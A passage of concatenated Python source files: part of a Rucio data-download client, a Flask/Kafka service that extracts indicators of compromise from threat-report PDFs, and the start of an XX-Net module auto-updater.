gid) del gid_to_item[gid] if len(stopped) > 0: logger(logging.INFO, 'Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped)) return items def _resolve_and_merge_input_items(self, items): """ This function takes the input items given to download_dids etc. and merges them respecting their individual options. This way functions can operate on these items in batch mode. E.g., list_replicas calls are reduced. :param items: List of dictionaries. Each dictionary describing an input item :returns: a dictionary with a dictionary that maps the input DIDs to options and a list with a dictionary for each merged download item :raises InputValidationError: if one of the input items is in the wrong format """ logger = self.logger # check mandatory options before doing any server calls for item in items: if item.get('resolve_archives') is not None: logger(logging.WARNING, 'resolve_archives option is deprecated and will be removed in a future release.') item.setdefault('no_resolve_archives', not item.pop('resolve_archives')) did = item.get('did', []) if len(did) == 0: if not item.get('filters', {}).get('scope'): logger(logging.DEBUG, item) raise InputValidationError('Item without did and filter/scope') item['did'] = [None] elif not isinstance(did, list): item['did'] = [did] distinct_keys = ['rse', 'force_scheme', 'nrandom'] all_resolved_did_strs = set() did_to_options = {} merged_items = [] download_info = {'did_to_options': did_to_options, 'merged_items': merged_items} while len(items) > 0: item = items.pop() filters = item.get('filters', {}) item_dids = item.pop('did') if item_dids[0] is None: logger(logging.DEBUG, 'Resolving DIDs by using filter options') item_dids = [] scope = filters.pop('scope') for did_name in self.client.list_dids(scope, filters=filters, type='all'): item_dids.append('%s:%s' % (scope, did_name)) base_dir = item.pop('base_dir', '.') no_subdir = item.pop('no_subdir', False) ignore_checksum = item.pop('ignore_checksum', False) new_transfer_timeout = item.pop('transfer_timeout', None) resolved_dids = item.setdefault('dids', []) for did_str in item_dids: did_scope, did_name = self._split_did_str(did_str) tmp_did_names = [] if '*' in did_name: filters['name'] = did_name tmp_did_names = list(self.client.list_dids(did_scope, filters=filters, type='all')) else: tmp_did_names = [did_name] for did_name in tmp_did_names: resolved_did_str = '%s:%s' % (did_scope, did_name) options = did_to_options.setdefault(resolved_did_str, {}) options.setdefault('destinations', set()).add((base_dir, no_subdir)) if resolved_did_str in all_resolved_did_strs: # in this case the DID was already given in another item # the options of this DID will be ignored and the options of the first item that contained the DID will be used # another approach would be to compare the options and apply the more relaxed options logger(logging.DEBUG, 'Ignoring further options of DID: %s' % resolved_did_str) continue options['ignore_checksum'] = (options.get('ignore_checksum') or ignore_checksum) cur_transfer_timeout = options.setdefault('transfer_timeout', None) if cur_transfer_timeout is not None and new_transfer_timeout is not None: options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout)) elif new_transfer_timeout is not None: options['transfer_timeout'] = int(new_transfer_timeout) resolved_dids.append({'scope': did_scope, 'name': did_name}) all_resolved_did_strs.add(resolved_did_str) if len(resolved_dids) == 0: logger(logging.WARNING, 'An item didnt have any DIDs after resolving the input. Ignoring it.') logger(logging.DEBUG, item) continue was_merged = False for merged_item in merged_items: if all(item.get(k) == merged_item.get(k) for k in distinct_keys): merged_item['dids'].extend(resolved_dids) was_merged = True break if not was_merged: item['dids'] = resolved_dids merged_items.append(item) return download_info def _get_sources(self, merged_items, resolve_archives=True): """ Get sources (PFNs) of the DIDs. :param merged_items: list of dictionaries. Each dictionary describes a bunch of DIDs to download :returns: list of list of dictionaries. """ logger = self.logger merged_items_with_sources = [] # if excluding tapes, we need to list them first tape_rses = [] if self.is_tape_excluded: try: tape_rses = [endp['rse'] for endp in self.client.list_rses(rse_expression='istape=true')] except: logger(logging.DEBUG, 'No tapes found.') for item in merged_items: # since we're using metalink we need to explicitly give all schemes schemes = item.get('force_scheme') if schemes: schemes = schemes if isinstance(schemes, list) else [schemes] logger(logging.DEBUG, 'schemes: %s' % schemes) # RSE expression, still with tape endpoints included rse_expression = item.get('rse') logger(logging.DEBUG, 'rse_expression: %s' % rse_expression) # get PFNs of files and datasets logger(logging.DEBUG, 'num DIDs for list_replicas call: %d' % len(item['dids'])) metalink_str = self.client.list_replicas(item['dids'], schemes=schemes, rse_expression=rse_expression, client_location=self.client_location, resolve_archives=resolve_archives, resolve_parents=True, metalink=True) file_items = parse_replicas_from_string(metalink_str) logger(logging.DEBUG, 'num resolved files: %s' % len(file_items)) # list_replicas returns nothing if the DID does not exist and we dont want to # do another server call so we check if there is a result from list_replicas # for each given DID. If not the DID does not exist for input_did in item['dids']: input_did = DIDType(input_did) if not any([input_did == f['did'] or str(input_did) in f['parent_dids'] for f in file_items]): logger(logging.ERROR, 'DID does not exist: %s' % input_did) # TODO: store did directly as DIDType object file_items.append({'did': str(input_did), 'adler32': None, 'md5': None, 'sources': [], 'parent_dids': set()}) # filtering out tape sources if self.is_tape_excluded: for item in file_items: sources = item['sources'] for src in item['sources']: if src in tape_rses: sources.remove(src) if not sources: logger(logging.WARNING, 'Requested did {} has only replicas on tape. No files will be download.'.format(item['did'])) nrandom = item.get('nrandom') if nrandom: logger(logging.INFO, 'Selecting %d random replicas from DID(s): %s' % (nrandom, item['dids'])) random.shuffle(file_items) file_items = file_items[0:nrandom] merged_items_with_sources.append(file_items) else: merged_items_with_sources.append(file_items) return merged_items_with_sources def _prepare_items_for_download(self, did_to_options, merged_items_with_sources, resolve_archives=True): """ Optimises the amount of files to download (This function is meant to be used as class internal only) :param did_to_options: dictionary that maps each input DID to some input options :param merged_items_with_sources: list of dictionaries. Each dictionary describes a bunch of DIDs to download :returns: list of dictionaries. Each dictionary describes an element to download :raises InputValidationError: if the given input is not valid or incomplete """ logger = self.logger if resolve_archives: # perhaps we'll need an extraction tool so check what is installed self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()] if len(self.extraction_tools) < 1: logger(logging.WARNING, 'Archive resolution is enabled but no extraction tool is available. ' 'Sources whose protocol doesnt support extraction wont be considered for download.') # maps file item IDs (fiid) to the file item object fiid_to_file_item = {} # list of all file item objects all_file_items = [] # cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction # this dict will contain all ids of cea's that definitely will be downloaded cea_id_pure_to_fiids = {} # this dict will contain ids of cea's that have higher prioritised non cea sources cea_id_mixed_to_fiids = {} all_input_dids = set(did_to_options.keys()) all_dest_file_paths = set() # get replicas for every file of the given dids for file_items in merged_items_with_sources: all_file_items.extend(file_items) for file_item in file_items: # parent_dids contains all parents, so we take the intersection with the input dids dataset_did_strs = file_item.setdefault('parent_dids', set()) dataset_did_strs.intersection_update(all_input_dids) file_did_str = file_item['did'] file_did_scope, file_did_name = self._split_did_str(file_did_str) file_item['scope'] = file_did_scope file_item['name'] = file_did_name logger(logging.DEBUG, 'Queueing file: %s' % file_did_str) logger(logging.DEBUG, 'real parents: %s' % dataset_did_strs) logger(logging.DEBUG, 'options: %s' % did_to_options) # prepare destinations: # if datasets were given: prepare the destination paths for each dataset options = None dest_file_paths = file_item.get('dest_file_paths', set()) for dataset_did_str in dataset_did_strs: options = did_to_options.get(dataset_did_str) if not options: logger(logging.ERROR, 'No input options available for %s' % dataset_did_str) continue destinations = options['destinations'] dataset_scope, dataset_name = self._split_did_str(dataset_did_str) paths = [os.path.join(self._prepare_dest_dir(dest[0], dataset_name, dest[1]), file_did_name) for dest in destinations] if any(path in all_dest_file_paths for path in paths): raise RucioException("Multiple file items with same destination file path") all_dest_file_paths.update(paths) dest_file_paths.update(paths) # workaround: just take any given dataset for the traces and the output file_item.setdefault('dataset_scope', dataset_scope) file_item.setdefault('dataset_name', dataset_name) # if no datasets were given only prepare the given destination paths if len(dataset_did_strs) == 0: options = did_to_options.get(file_did_str) if not options: logger(logging.ERROR, 'No input options available for %s' % file_did_str) continue destinations = options['destinations'] paths = [os.path.join(self._prepare_dest_dir(dest[0], file_did_scope, dest[1]), file_did_name) for dest in destinations] if any(path in all_dest_file_paths for path in paths): raise RucioException("Multiple file items with same destination file path") all_dest_file_paths.update(paths) dest_file_paths.update(paths) if options is None: continue file_item['merged_options'] = options file_item['dest_file_paths'] = list(dest_file_paths) file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0] # the file did str ist not an unique key for this dict because multiple calls of list_replicas # could result in the same DID multiple times. So we're using the id of the dictionary objects fiid = id(file_item) fiid_to_file_item[fiid] = file_item if resolve_archives: min_cea_priority = None num_non_cea_sources = 0 cea_ids = [] sources = [] # go through sources and check how many (non-)cea sources there are, # index cea sources, or remove cea sources if there is no extraction tool for source in file_item['sources']: is_cea = source.get('client_extract', False) if is_cea and (len(self.extraction_tools) > 0): priority = int(source['priority']) if min_cea_priority is None or priority < min_cea_priority: min_cea_priority = priority # workaround since we dont have the archive DID use the part behind the last slash of the PFN # this doesn't respect the scope of the archive DID!!! # and we trust that client_extract==True sources dont have any parameters at the end of the PFN cea_id = source['pfn'].split('/') cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2] cea_ids.append(cea_id) sources.append(source) elif not is_cea: num_non_cea_sources += 1 sources.append(source) else: # no extraction tool logger(logging.DEBUG, 'client_extract=True; ignoring source: %s' % source['pfn']) logger(logging.DEBUG, 'Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d' % (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids))) file_item['sources'] = sources # if there are no cea sources we are done for this item if min_cea_priority is None: continue # decide if file item belongs to the pure or mixed map # if no non-archive src exists or the highest prio src is an archive src we put it in the pure map elif num_non_cea_sources == 0 or min_cea_priority == 1: logger(logging.DEBUG, 'Adding fiid to cea pure map: ' 'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d' % (num_non_cea_sources, min_cea_priority, len(cea_ids))) for cea_id in cea_ids: cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid) file_item.setdefault('cea_ids_pure', set()).add(cea_id) # if there are non-archive sources and archive sources we put it in the mixed map elif len(cea_ids) > 0: logger(logging.DEBUG, 'Adding fiid to cea mixed map: ' 'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d' % (num_non_cea_sources, min_cea_priority, len(cea_ids))) for cea_id in cea_ids: cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid) file_item.setdefault('cea_ids_mixed', set()).add(cea_id) # put all archives from the mixed list into the pure list if they meet # certain conditions, e.g., an archive that is already in the pure list for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()): fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed] if cea_id_mixed in cea_id_pure_to_fiids: # file from mixed list is already in a pure list logger(logging.DEBUG, 'Mixed ID is already in cea pure map: ' 'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d' % (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed]))) elif len(fiids_mixed) >= self.use_cea_threshold: # more than use_cea_threshold files are in a common archive logger(logging.DEBUG, 'Number of needed files in cea reached threshold: ' 'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d' % (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold)) else: # dont move from mixed list to pure list continue # first add cea_id to pure map so it can be removed from mixed map later cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed) # now update all file_item mixed/pure maps for fiid_mixed in list(fiids_mixed): file_item = fiid_to_file_item[fiid_mixed] # add cea id to file_item pure map file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed) # remove file item mixed map and # remove references from all other mixed archives to file_item for cea_id_mixed2 in file_item.pop('cea_ids_mixed'): cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed) # finally remove cea_id from mixed map cea_id_mixed_to_fiids.pop(cea_id_mixed) for file_item in all_file_items: cea_ids_pure = file_item.get('cea_ids_pure', set()) cea_ids_mixed = file_item.get('cea_ids_mixed', set()) if len(cea_ids_pure) > 0: logger(logging.DEBUG, 'Removing all non-cea sources of file %s' % file_item['did']) file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)] elif len(cea_ids_mixed) > 0: logger(logging.DEBUG, 'Removing all cea sources of file %s' % file_item['did']) file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)] # reduce the amount of archives to download by removing # all redundant pure archives (=all files can be extracted from other archives) for cea_id_pure in list(cea_id_pure_to_fiids.keys()): # if all files of this archive are available in more than one archive the archive is redundant if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]): for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]: fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure) logger(logging.DEBUG, 'Removing redundant archive %s' % cea_id_pure) cea_id_pure_to_fiids.pop(cea_id_pure) # remove all archives of a file except a single one so # that each file is assigned to exactly one pure archive for cea_id_pure in cea_id_pure_to_fiids: for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]: cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure'] for cea_id_pure_other in list(cea_ids_pure): if cea_id_pure != cea_id_pure_other: cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure) cea_ids_pure.discard(cea_id_pure_other) download_packs = [] cea_id_to_pack = {} for file_item in all_file_items: cea_ids = file_item.get('cea_ids_pure', set()) if len(cea_ids) > 0: cea_id = next(iter(cea_ids)) pack = cea_id_to_pack.get(cea_id) if pack is None: scope = file_item['scope'] first_dest = next(iter(file_item['merged_options']['destinations'])) dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, first_dest[1]), cea_id) pack = {'scope': scope, 'name': cea_id, 'dest_file_paths': [dest_path], 'temp_file_path': '%s.part' % dest_path, 'sources': file_item['sources'], 'merged_options': {'ignore_checksum': True}, # we currently dont have checksums for the archive 'archive_items': [] } cea_id_to_pack[cea_id] = pack download_packs.append(pack) file_item.pop('sources') pack['archive_items'].append(file_item) else: download_packs.append(file_item) return download_packs def _split_did_str(self, did_str): """ Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part (This function is meant to be used as class internal only) :param did_str: the DID string that will be splitted :returns: the scope- and name part of the given DID :raises InputValidationError: if the given DID string is not valid """ did = did_str.split(':') if len(did) == 2: did_scope = did[0] did_name = did[1] elif len(did) == 1: did = did_str.split('.') did_scope = did[0] if did_scope == 'user' or did_scope == 'group': did_scope = '%s.%s' % (did[0], did[1]) did_name = did_str else: raise InputValidationError('%s is not a valid DID. To many colons.' % did_str) if did_name.endswith('/'): did_name = did_name[:-1] return did_scope, did_name @staticmethod def _prepare_dest_dir(base_dir, dest_dir_name, no_subdir): """ Builds the final destination path for a file and creates the destination directory if it's not existent. (This function is meant to be used as class internal only) :param base_dir: base directory part :param dest_dir_name: name of the destination directory :param no_subdir: if no subdirectory should be created :returns: the absolut path of the destination directory """ # append dest_dir_name, if subdir should be used dest_dir_path = os.path.join(os.path.abspath(base_dir), '' if no_subdir else dest_dir_name) if not os.path.isdir(dest_dir_path): os.makedirs(dest_dir_path) return dest_dir_path def _check_output(self, output_items): """ Checks if all files were successfully downloaded (This function is meant to be used as class internal only) :param output_items: list of dictionaries describing the downloaded files :returns: output_items list :raises NoFilesDownloaded: :raises NotAllFilesDownloaded: """ success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE'] # failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED'] num_successful = 0 num_failed = 0 for item in output_items: clientState = item.get('clientState', 'FAILED') if clientState in success_states: num_successful += 1 else: num_failed += 1 if num_successful == 0: raise NoFilesDownloaded() elif num_failed > 0: raise NotAllFilesDownloaded() return output_items def _send_trace(self, trace): """ Checks if sending trace is allowed and send the trace. :param trace: the trace """ if self.tracing: send_trace(trace, self.client.host, self.client.user_agent) def _verify_checksum(item, path): rucio_checksum = item.get(PREFERRED_CHECKSUM) local_checksum = None checksum_algo = CHECKSUM_ALGO_DICT.get(PREFERRED_CHECKSUM) if rucio_checksum and checksum_algo: local_checksum = checksum_algo(path) return rucio_checksum == local_checksum, rucio_checksum, local_checksum for checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS: rucio_checksum = item.get(checksum_name) checksum_algo = CHECKSUM_ALGO_DICT.get(checksum_name) if rucio_checksum and checksum_algo: local_checksum = checksum_algo(path) return rucio_checksum == local_checksum, rucio_checksum, local_checksum return False, None, None
server.py
''' Server-Class for the extractions of IoC's. ''' # pylint: disable=C0413, C0411 import os import sys import json import pytz import re import iocextract as ioce sys.path.append('..') from io import StringIO from threading import Thread from kafka.producer import KafkaProducer from kafka.consumer import KafkaConsumer from pdfminer.converter import TextConverter from pdfminer.layout import LAParams from pdfminer.pdfdocument import PDFDocument from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter from pdfminer.pdfpage import PDFPage from pdfminer.pdfparser import PDFParser from ioc_finder import find_iocs from flask import Flask from flask import request from flask import render_template from flask_script import Server from flask_apscheduler import APScheduler from flask_dropzone import Dropzone from libs.core.filter import filter_dict_values from libs.core.filter import filter_by_blacklist from libs.core.merge_dicts import merge_dicts from libs.core.environment import envvar from libs.kafka.topichandler import create_topic_if_not_exists from libs.kafka.logging import LogMessage from libs.kafka.logging import send_health_message from libs.extensions.loader import load_extensions from libs.gitlabl.files import read_file_from_gitlab from libs.gitlabl.sanitize_title import sanitize_title from libs.text_summarization.tsummarization import summarize import traceback # ENVIRONMENT-VARS SERVICENAME = envvar("SERVICENAME", "Extractor") IOC_TOPIC_NAME = envvar("IOC_TOPIC", "ioc") SCRAPER_TOPIC_NAME = envvar("SCRAPER_TOPIC", "datascraper") # nosec KAFKA_SERVER = envvar("KAFKA_SERVER", "0.0.0.0:9092") HEALTHTOPIC = envvar("HEALTH_TOPIC", "health_report") # nosec GITLAB_SERVER = envvar("GITLAB_SERVER", "0.0.0.0:10082") GITLAB_TOKEN = envvar("GITLAB_TOKEN", "NOTWORKING") GITLAB_REPO_NAME = envvar("GITLAB_REPO_NAME", "IOCFindings") DOCKER_REPORTS_PATH = "/app/iocextractor/reports" class Config: ''' Config class with configs for flask. ''' SCHEDULER_API_ENABLED = True app = Flask(SERVICENAME, template_folder='templates', static_folder="static/", static_url_path='/static') app.config.from_object(Config()) app.config['DROPZONE_ALLOWED_FILE_CUSTOM'] = True app.config['DROPZONE_ALLOWED_FILE_TYPE'] = '.pdf' app.config['DROPZONE_MAX_FILE_SIZE'] = 10 app.config['DROPZONE_MAX_FILES'] = 100 app.config['UPLOADED_PATH'] = os.path.join(DOCKER_REPORTS_PATH, 'uploads') dropzone = Dropzone(app) scheduler = APScheduler() scheduler.init_app(app) def flaskapp(): ''' flaskapp will return the FLASK_APP. @return a flask_app ''' return app class Extractor(Server): ''' Extractor will be the class for the extractor-server. ''' EXTENSIONS = load_extensions(SERVICENAME) BLACKLIST = {} @app.route('/', methods=['GET', 'POST']) def file_dropzone(): ''' file_dropzone will render a drag and drop view for the reports. @return a rendered template. ''' if request.method == 'POST': files = request.files.get('file') file_path = os.path.join(DOCKER_REPORTS_PATH, files.filename) files.save(file_path) return render_template('index.html') @staticmethod @scheduler.task("interval", id="refetch", seconds=30, timezone=pytz.UTC) def refetch_blacklist(): ''' refetch_blacklist will fetch the blacklist from the master every 30 minutes. ''' content = {} try: if Extractor.BLACKLIST is None or len(Extractor.BLACKLIST) <= 0: LogMessage("Using local blacklist.", LogMessage.LogTyp.INFO, SERVICENAME).log() with open(os.path.abspath("../datasets/blacklist.json")) as content: content = json.load(content) else: LogMessage("Using blacklist from gitlab.", LogMessage.LogTyp.INFO, SERVICENAME).log() content = read_file_from_gitlab(gitlabserver=GITLAB_SERVER, token=GITLAB_TOKEN, repository=GITLAB_REPO_NAME, file="blacklist.json", servicename=SERVICENAME, branch_name="master") content = json.loads(content) if content is not None: Extractor.BLACKLIST = content except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @staticmethod def pushfindings(findings): ''' pushfindings will push all findings to KAFKA. @param findings will be the findings. ''' try: producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, client_id='ioc_extractor', api_version=(2, 7, 0)) message = str(json.dumps(findings)).encode('UTF-8') producer.send(IOC_TOPIC_NAME, message) except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @staticmethod def extensions(string): ''' extensions will execute extensions for this server. @param string will be the string to check against. @return findings in the string machting the extensions-rules. ''' findings = {} try: for i in Extractor.EXTENSIONS: try: l_findings = re.findall(i.get_pattern(), string) if len(l_findings) > 0 and isinstance(l_findings[0], tuple): findings[str(i.field)] = [ element[i.get_group()] if len(element) - 1 >= i.get_group() else element.group(0) for element in l_findings] else: findings[str(i.field)] = l_findings except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() return findings def extract_ioc(pdftext): ''' extract_ioc will extract ioc from a given text all ioc. @param pdftext will be the text to search trough. @return will return a dictonary with all icos or an empty dict incase of no ioc or an error. ''' iocs = {} try: iocs = find_iocs(pdftext) urls = [rule for rule in ioce.extract_urls(pdftext, refang=True)] iocs['urls'] = list(dict.fromkeys(urls)) yara_rules = [rule for rule in ioce.extract_yara_rules(pdftext)] iocs['yara_rules'] = yara_rules if len(pdftext) > 200: iocs['textsummary'] = summarize(pdftext, SERVICENAME) ex_ioc = Extractor.extensions(pdftext) iocs = merge_dicts(iocs, filter_dict_values(ex_ioc, SERVICENAME), SERVICENAME) iocs = filter_by_blacklist(iocs, Extractor.BLACKLIST, SERVICENAME) except Exception as error: LogMessage(f"{str(error)} {''.join(traceback.format_tb(error.__traceback__))}", LogMessage.LogTyp.ERROR, SERVICENAME).log() return iocs @staticmethod def extract(reportpath): ''' extract will take a PDF-File as path and try to extract all IoC's. After the Extraction, the file will be removed. The IoC's will be pushed to KAFKA by calling the pushfindings-Function. @param reportpath will be the path to the PDF-File. ''' try: pdf_content = StringIO() LogMessage(f"Extract ioc's from file: {reportpath}", LogMessage.LogTyp.INFO, SERVICENAME).log() with open(reportpath, 'rb') as file: resource_manager = PDFResourceManager() device = TextConverter(resource_manager, pdf_content, laparams=LAParams()) interpreter = PDFPageInterpreter(resource_manager, device) for page in PDFPage.create_pages(PDFDocument(PDFParser(file))): interpreter.process_page(page) pdftext = pdf_content.getvalue() iocs = Extractor.extract_ioc(pdftext) input_filename = sanitize_title(unsanitized_title=str((os.path.basename(reportpath))), servicename=SERVICENAME) iocs['input_filename'] = input_filename Extractor.pushfindings(iocs) os.remove(reportpath) LogMessage(f"The ioc's had been extracted from the file and the file has been removed: {reportpath}", LogMessage.LogTyp.INFO, SERVICENAME).log() except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @scheduler.task("interval", id="health_push", seconds=5, timezone=pytz.UTC) def healthpush(): ''' healthpush will send a health message to KAFKA. ''' try: send_health_message(KAFKA_SERVER, HEALTHTOPIC, SERVICENAME) except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @staticmethod def handle_scraper_feed(data): ''' handle_scraper_feed take the data from scraper and extract all ioc and push the result to KAFKA for the ioc pusher. @param data will be the data from KAFKA. ''' try: if (json_data := json.loads(data.value.decode("utf-8"))) is not None: iocs = Extractor.extract_ioc(json_data.get('content')) if iocs is not None and len(iocs) > 0: input_filename = sanitize_title(unsanitized_title=str(json_data.get('title')), servicename=SERVICENAME) iocs['input_filename'] = input_filename Extractor.pushfindings(iocs) except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @staticmethod def consume_findings_from_scraper(): ''' consume_findings_from_scraper will consume all findings from KAFKA and push them into the gitlab repository. ''' try: consumer = KafkaConsumer(SCRAPER_TOPIC_NAME, bootstrap_servers=KAFKA_SERVER, client_id='ioc_extractor', api_version=(2, 7, 0), ) for report in consumer: Thread(target=Extractor.handle_scraper_feed, args=(report,), daemon=True).start() except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @scheduler.task("interval", id="execute", seconds=10, timezone=pytz.UTC, misfire_grace_time=900) def execute(): ''' execute will run the service and search for PDF's and start for every file a thread. The thread will execute the extract-Function and extract all IoC's in a file. ''' try: if (reports := os.listdir(DOCKER_REPORTS_PATH)) is not None and len(reports) > 0: threads = [] for report in reports: if report.endswith(".pdf"): threads.append( Thread(target=Extractor.extract, args=(os.path.join(DOCKER_REPORTS_PATH, report),))) for instance in threads: instance.start() for instance in threads: instance.join() except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() def __call__(self, app, *args, **kwargs): ''' __call__ will be executed befor the server creation and run some functions on startup. So a Topic will be create for the IoC's and the scheduler will be started for the cron-jobs. @param self is the Server-Object. @param app will be the app passed to the __call__ function of the server-class @param *args and **kwargs will be the vargs passed to the __call__ function of the server-class ''' create_topic_if_not_exists(KAFKA_SERVER, IOC_TOPIC_NAME) Extractor.BLACKLIST = Extractor.refetch_blacklist() scheduler.start() Thread(target=Extractor.consume_findings_from_scraper, daemon=True).start() return Server.__call__(self, app, *args, **kwargs)
update.py
#!/usr/bin/env python # coding:utf-8 import os import urllib2 import json import time import threading import zipfile import sys import platform from distutils.version import LooseVersion from instances import xlog import config import uuid import update_from_github #opener = urllib2.build_opener() #update_url = "http://127.0.0.1:8080/update.json" update_url = "https://xxnet-update.appspot.com/update.json" update_content = "" update_dict = {} new_gae_proxy_version = "" gae_proxy_path = "" current_path = os.path.dirname(os.path.abspath(__file__)) root_path = os.path.abspath( os.path.join(current_path, os.pardir)) data_root = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data')) def get_opener(): autoproxy = '127.0.0.1:8087' import ssl if getattr(ssl, "create_default_context", None): cafile = os.path.join(data_root, "gae_proxy", "CA.crt") if not os.path.isfile(cafile): cafile = None context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=cafile) https_handler = urllib2.HTTPSHandler(context=context) opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}), https_handler) else: opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy})) return opener def version_to_bin(s): return reduce(lambda a, b: a << 8 | b, map(int, s.split("."))) def download_file(url, file): try: xlog.info("download %s to %s", url, file) opener = get_opener() req = opener.open(url, cafile="") CHUNK = 16 * 1024 with open(file, 'wb') as fp: while True: chunk = req.read(CHUNK) if not chunk: break fp.write(chunk) return True except: xlog.info("download %s to %s fail", url, file) return False def sha1_file(filename): import hashlib BLOCKSIZE = 65536 hasher = hashlib.sha1() try: with open(filename, 'rb') as afile: buf = afile.read(BLOCKSIZE) while len(buf) > 0: hasher.update(buf) buf = afile.read(BLOCKSIZE) return hasher.hexdigest() except: return False def install_module(module, new_version): import module_init import os, subprocess, sys current_path = os.path.dirname(os.path.abspath(__file__)) new_module_version_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, module, new_version)) #check path exist if not os.path.isdir(new_module_version_path): xlog.error("install module %s dir %s not exist", module, new_module_version_path) return #call setup.py setup_script = os.path.join(new_module_version_path, "setup.py") if not os.path.isfile(setup_script): xlog.warn("update %s fail. setup script %s not exist", module, setup_script) return config.set(["modules", module, "current_version"], str(new_version)) config.save() if module == "launcher": module_init.stop_all() import web_control web_control.stop() subprocess.Popen([sys.executable, setup_script], shell=False) os._exit(0) else: xlog.info("Setup %s version %s ...", module, new_version) try: module_init.stop(module) subprocess.call([sys.executable, setup_script], shell=False) xlog.info("Finished new version setup.") xlog.info("Restarting new version ...") module_init.start(module) except Exception as e: xlog.error("install module %s %s fail:%s", module, new_version, e) def download_module(module, new_version): import os global update_content, update_dict current_path = os.path.dirname(os.path.abspath(__file__)) download_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, 'data', 'downloads')) if not os.path.isdir(download_path): os.mkdir(download_path) try: for source in update_dict["modules"][module]["versions"][new_version]["sources"]: url = source["url"] filename = module + "-" + new_version + ".zip" file_path = os.path.join(download_path, filename) if os.path.isfile(file_path) and sha1_file(file_path) == update_dict["modules"][module]["versions"][new_version]["sha1"]: pass elif not download_file(url, file_path): xlog.warn("download %s fail", url) continue sha1 = sha1_file(file_path) if update_dict["modules"][module]["versions"][new_version]["sha1"] != sha1: xlog.warn("download %s sha1 wrong", url) continue module_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, module)) if not os.path.isdir(module_path): os.path.mkdir(module_path, "755") version_path = os.path.join(module_path, new_version) if os.path.isdir(version_path): xlog.error("module dir exist:%s, download exist.", version_path) return with zipfile.ZipFile(file_path, "r") as dz: dz.extractall(module_path) dz.close() import shutil unzip_path = os.path.abspath(os.path.join(module_path, module + "-" + new_version)) tag_path = os.path.abspath(os.path.join(module_path, new_version)) shutil.move(unzip_path, tag_path) msg = "Module %s new version %s downloaded, Install?" % (module, new_version) if sys.platform == "linux" or sys.platform == "linux2": from gtk_tray import sys_tray data_install = "%s|%s|install" % (module, new_version) data_ignore = "%s|%s|ignore" % (module, new_version) buttons = {1: {"data":data_install, "label":"Install", 'callback':general_gtk_callback}, 2: {"data":data_ignore, "label":"Ignore", 'callback':general_gtk_callback}} sys_tray.notify_general(msg=msg, title="Install", buttons=buttons) elif sys.platform == "win32": from win_tray import sys_tray if sys_tray.dialog_yes_no(msg, u"Install", None, None) == 1: install_module(module, new_version) else: ignore_module(module, new_version) elif sys.platform == "darwin": from mac_tray import sys_tray if sys_tray.presentAlert_withTitle_(msg, "Install"): install_module(module, new_version) else: ignore_module(module, new_version) else: install_module(module, new_version) break except Exception as e: xlog.warn("get gae_proxy source fail, content:%s err:%s", update_content, e) def ignore_module(module, new_version): config.set(["modules", module, "ignore_version"], str(new_version)) config.save() def general_gtk_callback(widget=None, data=None): args = data.split('|') if len(args) != 3: xlog.error("general_gtk_callback data:%s", data) return module = args[0] new_version = args[1] action = args[2] if action == "download": download_module(module, new_version) elif action == "install": install_module(module, new_version) elif action == "ignore": ignore_module(module, new_version) def 